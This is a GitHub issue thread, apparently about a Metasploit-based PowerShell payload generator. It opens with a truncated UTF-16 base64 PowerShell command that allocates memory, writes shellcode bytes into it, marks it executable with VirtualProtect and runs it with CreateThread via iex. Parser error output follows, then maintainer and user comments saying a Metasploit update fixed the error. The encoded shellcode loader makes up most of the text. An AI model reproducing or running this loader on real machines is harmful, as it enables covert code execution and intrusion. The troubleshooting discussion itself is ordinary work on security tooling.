AZAAsADUAfQA2ACwAYQB9ADAALABhAH0ANgAsADgAfQBjACwAMAB9AGEALAA4AH0ANgAsADQAfQBjACwANwB9ADYALAA4AH0AMAAsADIAfQAwACwAMAB9ADEALAAxAH0ANQAsAGMAfQA4ACwAOQB9AGUALAA2AH0ANQAsADAAfQA1ACwAMAB9ADUALAAwAH0ANQAsADAAfQA0ACwAMAB9ADUALAAwAH0ANAAsADAAfQA1ACwAMAB9ADYALAA4AH0AZQAsAGEAfQAwACwAZgB9AGQALABmAH0AZQAsADAAfQBmACwAZgB9AGQALAA1AH0AOQAsADcAfQA2ACwAYQB9ADEALAAwAH0ANQAsADYAfQA1ACwANwB9ADYALAA4AH0AOQAsADkAfQBhACwANQB9ADcALAA0AH0ANgAsADEAfQBmACwAZgB9AGQALAA1AH0AOAAsADUAfQBjACwAMAB9ADcALAA0AH0AMAAsAGEAfQBmACwAZgB9ADQALABlAH0AMAAsADgAfQA3ACwANQB9AGUALABjAH0AZQAsADgAfQA2ACwANwB9ADAALAAwAH0AMAAsADAAfQAwACwAMAB9ADYALABhAH0AMAAsADAAfQA2ACwAYQB9ADAALAA0AH0ANQAsADYAfQA1ACwANwB9ADYALAA4AH0AMAAsADIAfQBkACwAOQB9AGMALAA4AH0ANQAsAGYAfQBmACwAZgB9AGQALAA1AH0AOAAsADMAfQBmACwAOAB9ADAALAAwAH0ANwAsAGUAfQAzACwANgB9ADgALABiAH0AMwAsADYAfQA2ACwAYQB9ADQALAAwAH0ANgAsADgAfQAwACwAMAB9ADEALAAwAH0AMAAsADAAfQAwACwAMAB9ADUALAA2AH0ANgAsAGEAfQAwACwAMAB9ADYALAA4AH0ANQAsADgAfQBhACwANAB9ADUALAAzAH0AZQAsADUAfQBmACwAZgB9AGQALAA1AH0AOQAsADMAfQA1ACwAMwB9ADYALABhAH0AMAAsADAAfQA1ACwANgB9ADUALAAzAH0ANQAsADcAfQA2ACwAOAB9ADAALAAyAH0AZAAsADkAfQBjACwAOAB9ADUALABmAH0AZgAsAGYAfQBkACwANQB9ADgALAAzAH0AZgAsADgAfQAwACwAMAB9ADcALABkAH0AMgAsADgAfQA1ACwAOAB9ADYALAA4AH0AMAAsADAAfQA0ACwAMAB9ADAALAAwAH0AMAAsADAAfQA2ACwAYQB9ADAALAAwAH0ANQAsADAAfQA2ACwAOAB9ADAALABiAH0AMgAsAGYAfQAwACwAZgB9ADMALAAwAH0AZgAsAGYAfQBkACwANQB9ADUALAA3AH0ANgAsADgAfQA3ACwANQB9ADYALABlAH0ANAAsAGQAfQA2ACwAMQB9AGYALABmAH0AZAAsADUAfQA1ACwAZQB9ADUALABlAH0AZgAsAGYAfQAwACwAYwB9ADIALAA0AH0AMAAsAGYAfQA4ACwANQB9ADcALAAwAH0AZgAsAGYAfQBmACwAZgB9AGYALABmAH0AZQAsADkAfQA5ACwAYgB9AGYALABmAH0AZgAsAGYAfQBmACwAZgB9ADAALAAxAH0AYwAsADMAfQAyACwAOQB9AGMALAA2AH0ANwAsADUAfQBjACwAMQB9AGMALAAzAH0AYgAsAGIAfQBmACwAMAB9AGIALAA1AH0AYQAsADIAfQA1ACwANgB9ADYALABhAH0AMAAsADAAfQA1ACwAMwB9AGYALABmAH0AZAAiADsAJAB2AG4APQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIAdgAgAC0ATgBhAG0AZQAgACIASgBRACIAIAAtAG4AYQBtAGUAcwAgAHkAVABhADsAJAB2AG4APQAkAHYAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVABhACIALAAgACIAVwBpACIAKwAiAG4AIgArACIAMwAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFcAbgAgAD0AIAAkAFcAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAcgBwAHcAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgByAHAAdwAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAWgBOAD0AMAB4ADEAMAAwADQAOwBpAGYAIAAoACQAVwBuAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADQAKQB7ACQAWgBOAD0AJABXAG4ALgBMAH0AOwAkAHAAdgA9ACQAdgBuADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA0ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABKAG8AagAgAD0AIAAwADsAZgBvAHIAKAAkAFkAVgA9ADAAOwAkAFkAVgAgAC0AbABlACgAJABXAG4ALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAWQBWACsAKwApAHsAJAB2AG4AOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABwAHYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWQBWACkALAAgACQAVwBuAFsAJABZAFYAXQAsACAAMQApAH0AOwAkAHYAbgA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABwAHYALAAgADAAeAAxADAAMAA0ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABKAG8AagApADsAJABoAGYAYgA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJAB2AG4AOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwBpAG4AdABdADAALAAkAGgAZgBiACwAJABwAHYALAAwACwAMAAsADAAKQA7ACcAOwAkAEcAZwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQATwBaACkAKQA7ACQAUABXAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHcASwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJAB4AGkAYgBhACAAPQAgACIAQwA6AFwAJAB3AEsAXABmAGsAWgBMAHYAeABBAFwAJAB3AEsAJABQAFcAXAB2ADEALgAwAFwAJABQAFcAIgA7ACQAeABpAGIAYQAgAD0AIAAkAHgAaQBiAGEALgByAGUAcABsAGEAYwBlACgAIgBmAGsAWgBMACIALAAgACIAcwB5AHMAIgApADsAJAB4AGkAYgBhACAAPQAgACQAeABpAGIAYQAuAHIAZQBwAGwAYQBjAGUAKAAiAHYAeABBACIALAAgACIAdwBvAHcANgA0ACIAKQA7ACQAcQBwAFgAIAA9ACAAJwBUAHIAdQAiACsAIgBlACIAKwAiACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQAcQBwAFgAJwApAHsAJABQAFcAPQAgACQAeABpAGIAYQB9ADsAJABxAGEAPQAiACAAJABQAFcAIABxAEEAeQBrACAAJABHAGcAIgA7ACQAcQBhAD0AJABxAGEALgByAGUAcABsAGEAYwBlACgAIgBxAEEAeQBrACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAcQBhAA'+'==')" powershell : At line:1 char:820 At line:1 char:1

powershell : + ... o,long,erbe,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,on ... At line:1 char:1

powershell : + ~~ At line:1 char:1

powershell : Unexpected token 'Th' in expression or statement. At line:1 char:1

powershell : At line:1 char:822 At line:1 char:1

powershell : + ... ,long,erbe,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : At line:1 char:832 At line:1 char:1

powershell : + ... e,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,su ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing expression after ',' in pipeline element. At line:1 char:1

powershell : At line:1 char:832 At line:1 char:1

powershell : + ... ,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sul ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : At line:1 char:843 At line:1 char:1

powershell : + ... ,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sult,,and,PGE ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing expression after ',' in pipeline element. At line:1 char:1

powershell : At line:1 char:843 At line:1 char:1

powershell : + ... tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sult,,and,PGEr ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx At line:1 char:1

powershell : ception At line:1 char:1

powershell : + FullyQualifiedErrorId : UnexpectedToken At line:1 char:1

powershell :
At line:1 char:1

HackingDave commented 4 years ago

That error is different, I saw that yesterday when I was writing the new version.. an update to metasploit fixed it. I would recommend updating Metasploit and re-running. There’s an error message that is being added to the code.

crimsoncore commented 4 years ago

Hi Dave.

Confirmed, upgraded to metasploit v5.0.93-dev and it works now! So for the lengthy post above :) on the windows 10 is all good, and just checked win2012R2 - also good :)

Many thanks for the tip!

Luk

HackingDave commented 4 years ago

Closing this and fixed. I also added a check to make sure that if someone runs into this problem it tells them to update.

shankara-n commented 4 years ago

I will try on 2008 r2 now with udoated versions and get back to you